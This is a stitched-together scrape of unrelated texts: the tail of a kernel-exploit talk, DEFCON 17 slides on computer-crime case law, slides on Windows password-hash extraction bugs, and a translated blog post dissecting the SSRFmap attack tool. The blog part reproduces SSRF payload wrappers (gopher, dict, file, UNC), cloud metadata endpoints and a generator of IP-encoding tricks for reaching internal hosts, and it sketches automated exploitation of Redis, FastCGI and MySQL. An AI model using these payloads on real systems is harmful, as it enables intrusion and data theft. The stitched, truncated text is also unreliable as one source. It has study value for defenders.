• We revealed a new technique with the use of dispatcher objects and PreviousMode.
74
Conclusions
Momigari: Overview of the latest Windows OS kernel exploits
found in the wild
Twitter: @antonivanovm
Anton Ivanov
Kaspersky Lab
Twitter: @oct0xor
Boris Larin
Kaspersky Lab
Q&A ?
DEFCON 17
July 31, 2009
R.W. Clark
United States v. Prochner, 417 F.3d 54 (D. Mass.
July 22, 2005)
Definition of Special Skills
Special skill - a skill not possessed by members of the
general public and usually requiring substantial
education, training or licensing.
Examples - pilots, lawyers, doctors, accountants,
chemists, and demolition experts
Not necessarily have formal education or training
Acquired through experience or self-tutelage
Critical question is - whether the skill set elevates to a
level of knowledge and proficiency that eclipses that
possessed by the general public.
Court Recognizes Your
Special Skills
Feds won't deem proxies 'sophisticated'
The US government has dropped, for now, a plan to classify the use of
"proxy" servers as evidence of sophistication in committing a crime.
US Sentencing Commission was considering a change to federal
sentencing guidelines that would have increased sentences by about 25
percent for people convicted of crimes in which proxies are used to
hide the perpetrators' tracks.
Digital-rights advocates complained the language was too broad
Commission struck the controversial language from the amendments
Justice Department supported the proposed amendment as a way to
hand down stiffer sentences for people who set up elaborate proxy
networks--sometimes in multiple countries --to commit crimes and
hide their identities.
Digital-rights advocates said the amendment would have sent a
chilling message about using a common technology that is often
encouraged as a safer way of using the Internet.
Fortunately, the US Sentencing Commission will
not recognize your special skills
Agenda
Encrypted Hard Drive
Scope of Consent & Investigation
Untimely Search after Seizure
Consent/Destruction of Evidence/Revoke consent to
search computer
Border Search of PC Away from Border
FTC and Cyberspy Software
Installing viruses and key stroke logger
Responsible Disclosure
Cyberwarfare and Definitions
What Makes a Hacker – 2 operating systems
Spoliation of evidence can equal losing case
Anonymity
Swinging scale of CFAA
Possession of malware/Reverse engineering
Disclaimer
aka The fine Print
JER 3-307.
Teaching, Speaking and Writing
a.
Disclaimer for Speeches and Writings Devoted to Agency Matters. A DoD employee who uses or
permits the use of his military grade or who includes or permits the inclusion of his title or position as
one of several biographical details given to identify himself in connection with teaching, speaking or
writing, in accordance with 5 C.F.R. 2635.807(b)(1) (reference (h)) in subsection 2-100 of this Regulation,
shall make a disclaimer if the subject of the teaching, speaking or writing deals in significant part with
any ongoing or announced policy, program or operation of the DoD employee's Agency, as defined in
subsection 2-201 of this Regulation, and the DoD employee has not been authorized by appropriate
Agency authority to present that material as the Agency's position.
(1)
The required disclaimer shall expressly state that the views presented are those of the speaker or
author and do not necessarily represent the views of DoD or its Components.
(2)
Where a disclaimer is required for an article, book or other writing, the disclaimer shall be printed
in a reasonably prominent position in the writing itself. Where a disclaimer is required for a speech or
other oral presentation, the disclaimer may be given orally provided it is given at the beginning of the oral
presentation.
My Background
Army CERT
Navy CIO
US-CERT
In re: Grand Jury Subpoena to Sebastien Boucher,
2009 U.S. Dist. LEXIS 13006 (DC Ver. Feb. 19,
2009)
Gov’t appeal US Magistrate Judge’s Opinion and Order
granting Defendant’s motion to quash grand jury
subpoena that it violates his Fifth Amendment right.
Gov’t doesn’t want password for encrypted HD wants only
to have defendant provide an unencrypted version of the
HD to grand jury.
Court –Boucher must provide an unencrypted version of
HD to grand jury.
The act of production is incriminating in 2 situations – 1) existence
and location unknown to Gov’t; 2) production implicitly
authenticates.
Gov’t knows incriminating files on encrypted drive Z: and
will not use this as “authentication” will link files to
Defendant in other way
United States v. Richardson, 2008 U.S. Dist LEXIS 88242
(W.D. Penn. Oct 31, 2008)
United States v. Parson, 2009 U.S. Dist. LEXIS 15125 (W.D.
Penn. Feb. 25, 2009)
ICE Agents
Investigating Child Porn
Knock and Talk
Victim of identity theft
Can we search your computer for evidence of
identity theft
Scope of consent
ICE Knock & Talk - Child porn investigation
Defendant admits computer contains child porn but does not
give consent to search
ICE agents open up computer and seize HD.
Sits unsearched for 3 weeks until lead agent applied for and
gets warrant to search it
Agent out of office for 2 weeks on training, not in hurry
Conviction vacated, evidence suppressed, initial seizure
justified, delay in obtaining search authorization not within a
reasonable period of time
United States v. Mitchell, 2009 U.S. App. LEXIS 8258
(11th Cir. Ga. Apr. 22, 2009)
United States v. Knighton, Sr., 2009 U.S. App.
LEXIS 1360 (3rd Cir. NJ Jan. 23, 2009)
2 Level Sentence Enhancement for obstruction of
investigation.
2 FBI agents Philadelphia field office
Defendant’s residence, inform suspect child porn
Defendant admits, consents to search, shows agents to
2nd floor and computer, leave to 1st floor
Return to computer, monitor message “Washing
cache/cookies”
Defendant reveals turning on computer activates an
automatic software program that deletes temporary
cached Internet files and cookies, unless manually
bypassed.
United States v. Megahed, 2009 WL 722481 (M.D.
Fla. March 18, 2009)
Suspect not home FBI ask father for consent to search, FBI
takes computer away August 6, 2007
2 months later father w/d consent, unclear when image made
Computer not searched until a year later (apparently) key
evidence discovered October 2008
Motion to suppress evidence discovered – internet history file.
After agents searched, seized computer, captured mirror image
copy, and returned HD to defendant, evidence was discovered in
course of examine of mirror image copy.
In October 2008 neither defendant or his father retained a
reasonable expectation of privacy in the mirror image copy.
Valid consent to search carries the right to examine and
photocopy.
See US v Ponder, 444 F. 2d 816, 818 (5th Cir. 1971): Mason v
Pulliam, 557 F. 2d 426, 429 (5th Cir. 1977)(IRS document case).
United States v. Cotterman, 2009 U.S. Dist. LEXIS
14300 (DC Ariz. Feb. 23, 2009)
Search only justified as a border search because no p/c at all to allow the
search of the computer.
Decision to search based upon a TECS hit out of California based upon the
fact Defendant had a 15 year old child molestation conviction.
Search could have been done, (while not necessarily to the convenience of
the agents) at border, technician could have traveled from Tucson to do the
analysis.
Defendant and wife waited more than 8 hours at the border finally told
computer going to be taken to Tucson even though he offered to help
access the computer at the border. This offer was declined by the agents.
Search took at least 48 hours to yield results.
Cannot be said that Tucson became functional equivalent of border.
Because Tucson not functional equivalent of border (170 miles away)
Court agrees with the MJ evidence should be suppressed.
RemoteSpy
Legitimate Use
Substantial harm to consumers
TRO enjoining sale
FTC v. Cyberspy Software, LLC, 2009 U.S. Dist
LEXIS 13494 (M.D. Fla. Feb. 23, 2009)
Installed virus on office and personal computer to steal
passwords
Defendant motion to dismiss –
sending virus to detect and steal passwords located on a
computer does not constitute an attempt to intercept and
electronic communication for purposes of federal Wiretap act.
SCA does not apply
CFAA inapplicable – no harm plead
Court held – Wiretap Act claim dismissed
SCA claim unclear at this time whether Trojan program
accessed information stored on device
CFAA survives, harm sufficiently plead
Becker, et al. v. Toca, 2008 U.S. Dist. LEXIS 89123
(E.D. La. Sept 26, 2008)
Key logger installed on computer shared by defendant and his
ex-wife
Wiretap Act Claim
No interception –
definition of "intercept" "encompasses only acquisitions contemporaneous with transmission."
United States v. Steiger, 318 F.3d 1039, 1047 (11th Cir. 2003). See Steve Jackson Games, Inc. v.
United States Secret Service, 36 F.3d 457 (5th Cir. 1994); Konop v. Hawaiian Airlines, Inc., 302
F.3d 868 (9th Cir. 2001); In re Pharmatrak, Inc., 329 F.3d 9 (1st Cir. 2003); and Fraser v.
Nationwide Mutual Ins. Co., 352 F.3d 107 (3rd Cir. 2003).
SCA Claim
This court agrees with the reasoning in Theofel. The fact that Plaintiff may have already read the
emails and messages copied by Defendant does not take them out of the purview of the Stored
Communications Act. The plain language of the statute seems to include emails received by the
intended recipient where they remain stored by an electronic communication service.
However, as a point of clarification, Stored Communications Act protection does not extend to emails
and messages stored only on Plaintiff's personal computer. In re Doubleclick Inc., 154 F. Supp. 2d 497,
511 (S.D.N.Y. 2001)("the cookies' residence on plaintiffs' computers does not fall into § 2510(17)(B)
because plaintiffs are not 'electronic communication service' providers."). Defendant does not set
forth any other basis for dismissing the claim. Accordingly, Defendant Bailey is not entitled to
summary judgment on Plaintiff's [*18] claim for violation of 18 U.S.C. § 2701.
Bailey v. Bailey, 2008 U.S. Dist. LEXIS 8565 (E.D.
Mich. Feb. 6, 2008)
For the enterprise network manager, the notion of
responsible disclosure has centered on the idea that major
security flaws in products they use wouldn’t be shared
publicly in any way until a software vendor corrected them.
That's the underlying premise of what’s called the
Organization for Internet Safety (OIS) guidelines first
released five years ago and updated in 2004. An effort
spearheaded by Microsoft, the OIS guidelines now face
criticism from some of the very people who wrote them,
who argue enterprises should know about serious flaws
early for purposes of security workarounds.
Ellen Messmer, Network World 5/31/2007
Responsible Disclosure
First Rule as Attorney – Never get near a
Courtroom Especially in Criminal proceedings
Recent Examples & Discussion
Responsible Disclosure
Cyber Warfare & Definitions
Computer Network Security
Multiple disciplines
Network Ops-
CERTs/NOSCs
Intelligence
Counterintelligence
Law enforcement
Commander-in-Chief
Event Will Determine Response and Legal
Authority
Computer Security
Events
Incidents
Intrusions
Attacks
Calixte
College roommate domestic disturbance
Roommate informs cops Calixte CS major
Saw Hack into BC grading system
200+ illegally downloaded movies
Seized – 3 laptops; 2 iPods; 2 cell phones; digital
camera; numerous hard drives, flash drives, and
compact disks.
Commonwealth has begun to examine items seized but
unable to access data on HD of Calixte’s laptop
Motion quash search warrant; return property;
suppress any evidence from search in Newton District
Court – Judge p/c exists, appeal
Calixte
Gutman v Klein, 2008 U.S. dist LEXIS 92398 (E.D.
N.Y. Oct. 15 2008) (Civil Litigation Case)
Spoliation of Evidence, deletion Defendant's laptop
MJ ordered defendant to make available HDs, suspected
tampering, MJ court appointed forensic expert examination
“indicative of behavior of a user who was attempting to
permanently delete selective files from the machine and
then cover up the chronology of system changes occurring
in the hours and days just prior to a forensic preservation."
Litigation started 5 years earlier, duty to preserve,
Defendant’s explanation contradictory and incredible.
MJ what to do in response to spoliation – DJ
When a trial court is confronted with a defamation action in which
anonymous speakers or pseudonyms are involved, it should
1 require plaintiff to undertake efforts to notify anonymous posters they
are subject of a subpoena or application for an order of disclosure,
including posting a message of notification of the identity discovery
request on the message board;
2 withhold action to afford the anonymous posters reasonable
opportunity to file and serve opposition to the application;
3 require plaintiff to identify and set forth exact statements purportedly
made by each anonymous poster, alleged to constitute actionable
speech;
4 determine whether complaint has set forth a prima facie defamation
per se or per quod action against the anonymous posters; and
5 if all else is satisfied, balance anonymous poster's First Amendment
right against strength of the prima facie case of defamation presented by
plaintiff and necessity for disclosure of anonymous defendant's identity,
prior to ordering disclosure.
Independent Newspaper, Inc. v. Brodie, 2009 Md.
LEXIS (Ct. of Apps. Md. Feb 27, 2009)
Kluber Skahan & Associates, Inc. v. Cordogan, Clark &
Assoc., Inc., 2009 U.S. Dist. LEXIS 14527 (N.D. Ill.
February 25, 2009)
Motorola, Inc., v. Lemko Corp., 2009 U.S. Dist. LEXIS 10668
(N.D. Ill. February 11, 2009)
Lasco Foods, Inc., v. Hall and Shaw Sales, 2009 U.S. Dist.
LEXIS 4241 (E.D. Miss. January 22, 2009)
Condux International, Inc., v. Haugum, 2008 U.S. Dist
LEXIS 1000949 (D.Ct. Minn. December 15, 2008)
Computer Fraud and Abuse (CFAA)
Cases
Council of Europe’s Convention on Cybercrime
Federal U.S. law
State law
Possession of Burglary tools???
Possession of Malware
DMCA
Supreme Court - Bonito Boats v. Thunder Craft Boats
Sega Enterprise v. Accolade
Atari v. Nintendo
Sony v. Connectix Corp
Reverse Engineering
Contact Information
[email protected] | pdf |
Stamp Out Hash Corruption,
Crack All the Things!
Ryan Reynolds
Manager, Crowe Horwath
Pentester
Twitter: @reynoldsrb
Jonathan Claudius
SpiderLabs Security Researcher, Trustwave
Vulnerability Research
Twitter: @claudijd
What’s inside?
Windows Hash Extraction
Story of What We Found
Windows Hash Extraction Mechanics
A Different Approach
Why Are All the Tools Broken?
Demo
Patches
Let’s talk about
hashes!!!
Goals of Getting Hashes
Privilege Escalation
Password Analysis
Forensics Investigations
Windows Password Hashes
Two Types of Hashes:
LM (Lan Manager)
▪ Old Hashing Algorithm w/ Security Flaws
▪ Case insensitivity, Broken into 2 Components
NTLM (NT Lan Manager)
▪ Newer Hashing Algorithm w/ Security Flaws
▪ Not salted, but is case sensitive
Windows Password Hashes
Two Methods to Get Hashes:
Injection via LSASS
▪ Reads hashes from memory
Registry Reading via SAM/SYSTEM
▪ Reads hashes from local registry hives
Story Time…
Failed Attempt 1
Social Engineering Engagement
Gained Physical Access
Dumped Hashes on a Bank Workstation
Failed to Crack
John the Ripper
Rainbow Tables
Failed Attempt 2
Internal Penetration Assessment
Popped a Shell via Missing Patch
Dumped Hashes on System
Fail to Crack
Rainbow Tables (via all LM Space & French)
Pass the Hash (PTH)
Example Hashes
Via Registry (Metasploit)
LM: 4500a2115ce8e23a99303f760ba6cc96
NTLM: 5c0bd165cea577e98fa92308f996cf45
Via Injection (PwDump6)
LM: aad3b435b51404eeaad3b435b51404ee
NTLM: 5f1bec25dd42d41183d0f450bf9b1d6b
Bug Report
“Our Powers Combined…”
Beers
Hacking
More Beers
Where Do Hashes
Live?
Where Do Hashes Live?
HKLM\SAM
Store security information for each user (including
hash data)
HKLM\SYSTEM
Stores the SYSKEY (“salts” the SAM information
for security purposes)
What The Registry Looks Like
HKLM\SAM\SAM\domains\account\users\
Users: 000001F4, ..1F5, etc.
What’s Inside These Values?
For each user, we have two values…
“F” – Binary Data
▪ Last Logon, Account Expires, Password Expiry, etc.
“V”- Binary Data
▪ Username, LM Hash Data, NT Hash Data, etc.
A Closer Look At Raw Data
Raw Data w/ LM & NTLM Data
...0000AAAAAAAA0000BBBBBBBB00000...
Raw Data w/ just NTLM Hash Data
...00000000BBBBBBBB0000000000000...
Registry Extraction Tools
Metasploit Hashdump Script
Creddump
Samdump2
Cain and Able
Pwdump7
FGDump 3.0
Others
Current Parsing Logic
(size = length of the hash data at a fixed OFFSET in the "V" value)
If size > 40 bytes → LM & NTLM
Else if size > 20 bytes → NTLM
Else → None
The “Flaw”
Remember these?
Via Registry (Metasploit)
LM: 4500a2115ce8e23a99303f760ba6cc96
NTLM: 5c0bd165cea577e98fa92308f996cf45
Via Injection (PwDump6)
LM: aad3b435b51404eeaad3b435b51404ee
NTLM: 5f1bec25dd42d41183d0f450bf9b1d6b
The “Flaw”
Same size heuristic, but extra data (DATA++) now follows the hash data at the OFFSET:
If size > 40 bytes → LM & NTLM
Else if size > 20 bytes → NTLM
Else → None
The “Flaw”
BAD
...0000AAAAAAAA0000BBBBBBBB00000...
...00000000BBBBBBBB0000000000000...
Root Cause?
How do we get “DATA++”?
By following Microsoft best practices
Set Password History
No LM Hashes
OFFSET
HASH DATA
DATA++
Raw Look at “V” Data Structure
DATA++
LM HASH
DATA
NT HASH DATA
How often does this occur?
Newer OS’s do not store LM
Windows Vista and newer
LM can be disabled by a proactive Sysadmin
Password histories set through GPO
In an ideal world…
We would want…
LM Exists?
NTLM Exists?
Parse correct hash data 100% of the time
Raw Look at “V” Data Structure
LM HEADER | NT HEADER | DATA++ | LM HASH DATA | NT HASH DATA
A Different Approach
“V” hash 4-byte headers for LM & NTLM
0x4 (4 bytes) = Hash Not Present (false)
0x14 (20 bytes) = Hash Present (true)
No more guessing!
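The two strategies can be contrasted in a few lines over a simplified stand-in blob — the real "V" structure carries more fields and fixed offsets, so build_blob and the exact header layout here are illustrative assumptions, not the true registry format.

```python
# Header-based parsing vs. the broken size heuristic over a simplified
# stand-in for the "V" hash area: [LM header][LM data][NT header][NT data].
# A header length of 0x14 means a hash is present (4 bytes of metadata
# plus a 16-byte hash); 0x4 means absent.
import struct

def build_blob(lm, nt, extra=b""):
    out = b""
    for h in (lm, nt):
        if h is None:
            out += struct.pack("<I", 0x4)
        else:
            out += struct.pack("<I", 0x14) + b"\x00" * 4 + h
    return out + extra

def parse_by_size(blob):              # the broken heuristic
    if len(blob) > 40:
        return "LM+NTLM"
    elif len(blob) > 20:
        return "NTLM"
    return "None"

def parse_by_headers(blob):           # the fix: trust the length headers
    off, present = 0, []
    for name in ("LM", "NTLM"):
        (hlen,) = struct.unpack_from("<I", blob, off)
        off += 4
        if hlen == 0x14:
            present.append(name)
            off += 0x14
    return "+".join(present) if present else "None"

# NTLM-only blob padded by password-history data ("DATA++"):
blob = build_blob(None, b"B" * 16, extra=b"H" * 40)
print(parse_by_size(blob), parse_by_headers(blob))
```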
A Different Approach
If LM.exists? && NTLM.exists? → LM & NTLM
Else if NTLM.exists? → NTLM
Else → None
A Different Approach
BAD LOGIC
...0000AAAAAAAA0000BBBBBBBB00000...
...00000000BBBBBBBB0000000000000...
GOOD LOGIC
...0000AAAAAAAA0000BBBBBBBB00000...
...00000000BBBBBBBB0000000000000...
Why are all the
tools broken?
Who’s Patient Zero?
pwdump
Cain & Able
Creddump
Metasploit
Pwdump7
Fgdump 3.0
samdump2
Tool Timeline
Samdump2
v. 1.0.1
3/28/04
Cain & Abel
v. 2.7.4
7/9/05
Creddump
v. 0.1
2/20/08
MSF
Hashdump
12/30/09
FGDump
v. 3.0
11/9/11
Pwdump7
v. 7.1
3/10/10
Samdump2
v. 1.1.1
11/21/07
Pwdump v. 1
3/24/1997
Take Away
Reverse engineering is hard
Exhaustive testing is time consuming
Leveraging code is helpful
Fully reusing code is not always good
Open source let’s others learn and help fix!
Demonstration
Patches!!!!
Patches
Affected Tools
Patched?
Creddump
Yes
Metasploit’s Hashdump Script
Yes
L0phtcrack
Working with Author(s)
Pwdump7
Working with Author(s)
FGDump 3.0
Working with Author(s)
Samdump2
Fixed in v 1.1.1
Cain & Abel
Working with Author(s)
Click to edit Master subtitle style
Questions? | pdf |
SSRFmap covers most SSRF techniques, so I read through its code and detection methods, and combined with a few SSRF tricks, I wondered whether an automated SSRF detection + exploitation tool could be built.
SSRF Basics
The root cause of SSRF is that the server side uses network functions, and in most programming languages the network functions are backed by curl under the hood (of course, this depends on the specific function's code and underlying logic). Since curl supports many protocols, SSRF can leverage those protocols.

curl is an open-source command-line tool and library for data transfer. It uses URL syntax and supports numerous transfer protocols, including HTTP, HTTPS, FTP, FTPS, GOPHER, TFTP, SCP, SFTP, SMB, TELNET, DICT, LDAP, LDAPS, FILE, IMAP, SMTP, POP3, RTSP, and RTMP.
The commonly exploitable protocols are:
file
unc
gopher
dict
http
https
Notes for PHP:
1. file_get_contents with the gopher protocol cannot be URL-encoded
2. file_get_contents has a bug with gopher 302 redirects that causes exploitation to fail
3. curl/libcurl 7.43 has a gopher truncation bug; 7.45 and above are unaffected
4. curl_exec() does not follow redirects by default
5. file_get_contents() supports the php://input protocol
Java supports: http, https, file, ftp, mailto, jar, netdoc
Ssrfmap
ssrfmap的github是 https://github.com/swisskyrepo/SSRFmap
它的代码结构挺简单的
核⼼就是加载这个ssrf类,代码⽐较少,就直接贴出来好好学习⼀下
from core.requester import Requester
from core.handler import Handler
from importlib.machinery import SourceFileLoader
import os
import time
import logging

class SSRF(object):
    modules = set()
    handler = None
    requester = None

    def __init__(self, args):
        # Load the built-in modules (load_modules is defined below)
        self.load_modules()
        # Start the reverse-connection shell handler
        if args.handler and args.lport and args.handler == "1":
            handler = Handler(args.lport)
            handler.start()
        elif args.handler and args.lport:
            self.load_handler(args.handler)
            handler = self.handler.exploit(args.lport)
            handler.start()
        self.requester = Requester(args.reqfile, args.useragent, args.ssl)
        # NOTE: if args.param == None, target everything
        if args.param == None:
            logging.warning("No parameter (-p) defined, nothing will be tested!")
        # NOTE: if args.modules == None, try everything
        if args.modules == None:
            logging.warning("No modules (-m) defined, everything will be tested!")
            for module in self.modules:
                module.exploit(self.requester, args)
        else:
            for modname in args.modules.split(','):
                for module in self.modules:
                    if module.name == modname:
                        module.exploit(self.requester, args)
                        break
        # Handling a shell
        while args.handler:
            handler.listen_command()
            time.sleep(5)

    def load_modules(self):
        for index, name in enumerate(os.listdir("./modules")):
            location = os.path.join("./modules", name)
            if ".py" in location:
                mymodule = SourceFileLoader(name, location).load_module()
                self.modules.add(mymodule)

    def load_handler(self, name):
        handler_file = "{}.py".format(name)
        try:
            location = os.path.join("./handlers", handler_file)
            self.handler = SourceFileLoader(handler_file, location).load_module()
        except Exception as e:
            logging.error("Invalid no such handler: {}".format(name))
            exit(1)

A tip on modular programming in Python:

from importlib.machinery import SourceFileLoader
mymodule = SourceFileLoader(name, location).load_module()

name can be any string, and location is the path to the .py file; that is all it takes to load a module.

Modules

So what can you do once you have an SSRF vulnerability? You can attack all kinds of local or intranet services (Redis, MySQL, and so on), scan ports, map intranet assets, and more.

The modules listed in the official README are:
Name
Description
fastcgi
FastCGI RCE
redis
Redis RCE
github
Github Enterprise RCE < 2.8.7
zabbix
Zabbix RCE
mysql
MySQL Command execution
docker
Docker Infoleaks via API
smtp
SMTP send mail
portscan
Scan top 8000 ports for the host
networkscan
HTTP Ping sweep over the network
readfiles
Read files such as /etc/passwd
alibaba
Read files from the provider (e.g: meta-data, user-data)
aws
Read files from the provider (e.g: meta-data, user-data)
gce
Read files from the provider (e.g: meta-data, user-data)
digitalocean
Read files from the provider (e.g: meta-data, user-data)
socksproxy
SOCKS4 Proxy
smbhash
Force an SMB authentication via a UNC Path
tomcat
Bruteforce attack against Tomcat Manager
custom
Send custom data to a listening service, e.g: netcat
memcache
Store data inside the memcache instance
Looking at the actual directory, there are far more than these.

Some modules are written quite well, for example alibaba. Alibaba, like many other SRC programs, publishes the intranet metadata addresses and echo files that SSRF can probe, so using this module specifically for batch probing works very well.

Source of the alibaba module:

self.endpoints.add( ("100.100.100.200","latest/meta-data/instance-id") )
self.endpoints.add( ("100.100.100.200","latest/meta-data/image-id") )
self.endpoints.add( ("100.100.100.200","latest/meta-data/") )

It makes one baseline request first, then a second request carrying the payload, and takes the textual difference between the two responses.
The diff-taking function, shown next, is simple and crude (it is not actually very accurate; adapt it before reusing it). The protocol-wrapper functions in core/utils.py, which follow it, are also worth recording.
def diff_text(text1, text2):
    diff = ""
    for line in text1.split("\n"):
        if not line in text2:
            diff += line + "\n"
    return diff
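As a sketch of a more robust alternative (my own suggestion, not part of ssrfmap), Python's difflib can diff line-wise and keep only the lines added in the payload response:

```python
import difflib

def diff_text_v2(text1, text2):
    """Return lines present in text1 but not in text2 (line-wise diff)."""
    diff_lines = []
    for line in difflib.unified_diff(text2.splitlines(),
                                     text1.splitlines(),
                                     lineterm=""):
        # keep only added lines, skipping the '+++' file header
        if line.startswith("+") and not line.startswith("+++"):
            diff_lines.append(line[1:])
    return "\n".join(diff_lines)
```

Unlike the substring check above, this respects line positions, so a line that merely appears somewhere in the baseline is not silently dropped.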
def wrapper_file(data):
    return "file://{}".format(data)

def wrapper_unc(data, ip):
    return "\\\\{}\\{}".format(ip, data)

def wrapper_gopher(data, ip, port):
    return "gopher://{}:{}/_{}".format(ip, port, data)

def wrapper_dict(data, ip, port):
    return "dict://{}:{}/{}".format(ip, port, data)

def wrapper_http(data, ip, port, usernm=False, passwd=False):
    if usernm != False and passwd != False:
        return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
    return "http://{}:{}/{}".format(ip, port, data)

def wrapper_https(data, ip, port):
    return "https://{}:{}/{}".format(ip, port, data)

In the same way, the common IP-bypass tricks are also wrapped as functions in ssrfmap.

SSRF IP-rewriting bypass techniques:

default
default_shortcurt
ip_decimal_notation
...

URL-parser bypasses

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

This is useful well beyond SSRF: the affected scenarios include, but are not limited to, URL redirects, OAuth authentication, same-origin checks (such as the origin check on postMessage), and any other place where a host is validated.
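A quick usage sketch of the gopher wrapper (the CRLF payload here is illustrative, not a ready-made Redis exploit; the helper is repeated so the snippet runs on its own):

```python
def wrapper_gopher(data, ip, port):
    # same helper as in core/utils.py above
    return "gopher://{}:{}/_{}".format(ip, port, data)

# URL-encoded CRLF-separated commands, as gopher payloads usually are
payload = "PING%0d%0aQUIT%0d%0a"
url = wrapper_gopher(payload, "127.0.0.1", 6379)
print(url)  # gopher://127.0.0.1:6379/_PING%0d%0aQUIT%0d%0a
```

Note the `_` after the port: gopher treats the first character after the path slash as a type selector, so the wrapper sacrifices one throwaway character before the real data.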
def ip_default_local(ips, ip):
    ips.add("127.0.0.1")
    ips.add("0.0.0.0")
    ips.add("localhost")

def ip_default_shortcurt(ips, ip):
    ips.add("[::]")
    ips.add("0000::1")
    ips.add("0")
    ips.add("127.1")
    ips.add("127.0.1")

def ip_default_cidr(ips, ip):
    ips.add("127.0.0.0")
    ips.add("127.0.1.3")
    ips.add("127.42.42.42")
    ips.add("127.127.127.127")

def ip_decimal_notation(ips, ip):
    try:
        packedip = socket.inet_aton(ip)
        ips.add(struct.unpack("!l", packedip)[0])
    except:
        pass

def ip_dotted_decimal_with_overflow(ips, ip):
    try:
        ips.add(".".join([str(int(part) + 256) for part in ip.split(".")]))
    except:
        pass

def ip_dotless_decimal(ips, ip):
    def octet_to_decimal_part(ip_part, octet):
        return int(ip_part) * (256 ** octet)
    try:
        parts = [part for part in ip.split(".")]
        ips.add(str(octet_to_decimal_part(parts[0], 3) +
                octet_to_decimal_part(parts[1], 2) +
                octet_to_decimal_part(parts[2], 1) +
                octet_to_decimal_part(parts[3], 0)))
    except:
        pass

def ip_dotted_hexadecimal(ips, ip):
    def octet_to_hex_part(number):
        return str(hex(int(number)))
    try:
        ips.add(".".join([octet_to_hex_part(part) for part in ip.split(".")]))
    except:
        pass

def ip_dotted_octal(ips, ip):
    def octet_to_oct_part(number):
        return str(oct(int(number))).replace("o", "")
    try:
        ips.add(".".join([octet_to_oct_part(part) for part in ip.split(".")]))
    except:
        pass

def ip_dotless_decimal_with_overflow(ips, ip):
    def octet_to_decimal_part(ip_part, octet):
        return int(ip_part) * (256 ** octet)
    try:
        parts = [part for part in ip.split(".")]
        ips.add(str(octet_to_decimal_part(parts[0], 3) +
                octet_to_decimal_part(parts[1], 2) +
                octet_to_decimal_part(parts[2], 1) +
                octet_to_decimal_part(parts[3], 0)))
    except:
        pass

def ip_enclosed_alphanumeric(ips, ip):
    intab = "1234567890abcdefghijklmnopqrstuvwxyz"
    if ip == "127.0.0.1":
        ips.add("ⓛⓞⒸⒶⓛⓣⒺⓢⓣ.ⓜⒺ")
    outtab = "①②③④⑤⑥⑦⑧⑨⓪ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄ℗ⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ"
    trantab = ip.maketrans(intab, outtab)
    ips.add(ip.translate(trantab))
    outtab = "①②③④⑤⑥⑦⑧⑨⓪ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"
    trantab = ip.maketrans(intab, outtab)
    ips.add(ip.translate(trantab))

def ip_dns_redirect(ips, ip):
    if ip == "127.0.0.1":
        ips.add("localtest.me")
        ips.add("customer1.app.localhost.my.company.127.0.0.1.nip.io")
        ips.add("localtest$google.me")
    if ip == "169.254.169.254":
        ips.add("metadata.nicob.net")
        ips.add("169.254.169.254.xip.io")
        ips.add("1ynrnhl.xip.io")

def gen_ip_list(ip, level):
    ips = set()
    if level == 1:
        ips.add(ip)
    if level == 2:
        ip_default_local(ips, ip)
        ip_default_shortcurt(ips, ip)
    if level == 3:
        ip_dns_redirect(ips, ip)
        ip_default_cidr(ips, ip)
    if level == 4:
        ip_decimal_notation(ips, ip)
        ip_enclosed_alphanumeric(ips, ip)
    if level == 5:
        ip_dotted_decimal_with_overflow(ips, ip)
        ip_dotless_decimal(ips, ip)
        ip_dotless_decimal_with_overflow(ips, ip)
        ip_dotted_hexadecimal(ips, ip)
        ip_dotted_octal(ips, ip)
    for ip in ips:
        yield ip

Thoughts on automation

Automation splits into two parts: automated detection and automated exploitation. Detection can start directly with dnslog. Once dnslog confirms out-of-band interaction, test the dict, gopher, file and other protocols. Each of these can be checked against a carefully built detection server that emulates the various protocols; the file protocol can also be probed through a network (UNC) path.
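Calling the gen_ip_list generator above looks like this. This is a trimmed, self-contained sketch (only the level-2 helper is stubbed in; the real module wires up all of the bypass functions shown earlier):

```python
def ip_default_local(ips, ip):
    # minimal stand-in for the real bypass helpers
    ips.add("127.0.0.1")
    ips.add("0.0.0.0")
    ips.add("localhost")

def gen_ip_list(ip, level):
    ips = set()
    if level == 1:
        ips.add(ip)
    if level == 2:
        ip_default_local(ips, ip)
    # each yielded value is one candidate bypass form of the original IP
    for ip in ips:
        yield ip

for candidate in gen_ip_list("127.0.0.1", 2):
    print(candidate)
```

Each level trades coverage for request count: level 1 sends only the literal target, while the higher levels fan out into every encoding trick.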
From this you can learn which protocol types the target supports.

Once you know the protocols and whether output is echoed, the next stage is automated exploitation.

Writing exploitation modules

ssrfmap is built around modules: every component that can be attacked through SSRF is one module. Its modules are written quite simply, though, and I think they can be upgraded. Since the exploitation technique differs per protocol, each plugin could declare these parameters:

1. the component it targets
2. the protocols it can use
3. whether it needs echoed output
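The plugin parameters suggested above could be declared like this. This is a hypothetical interface of my own design, not ssrfmap's actual module API:

```python
from dataclasses import dataclass, field

@dataclass
class ModuleInfo:
    component: str                                  # which component the module attacks
    protocols: list = field(default_factory=list)   # protocols it can drive the SSRF through
    needs_echo: bool = False                        # whether exploitation requires echoed output

# example declaration for a Redis module
redis_info = ModuleInfo("redis", ["gopher", "dict"], needs_echo=False)
```

With such declarations, the engine could skip any module whose required protocols or echo behavior the target does not support, instead of blindly firing every payload.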
The basic SSRF exploitation modules to cover first:
alibaba
aws
digitalocean
docker
fastcgi
gce
memcache
mysql
network-segment scanning / port scanning
file reading
redis
sendmail
socksproxy
zabbix
These are only ideas for now; they will be fleshed out once the tool is actually written.

Self-hosted verification server

Freely configurable 30x redirects

When the echo probe identifies python urllib, hint that the CRLF CVE may apply

CVE-2019-9948 affects only urllib, on Python 2.x up to 2.7.16, and allows reading files via the local-file protocol

DNS rebinding

Of course, the above is the ideal case; behavior differs across languages and servers:

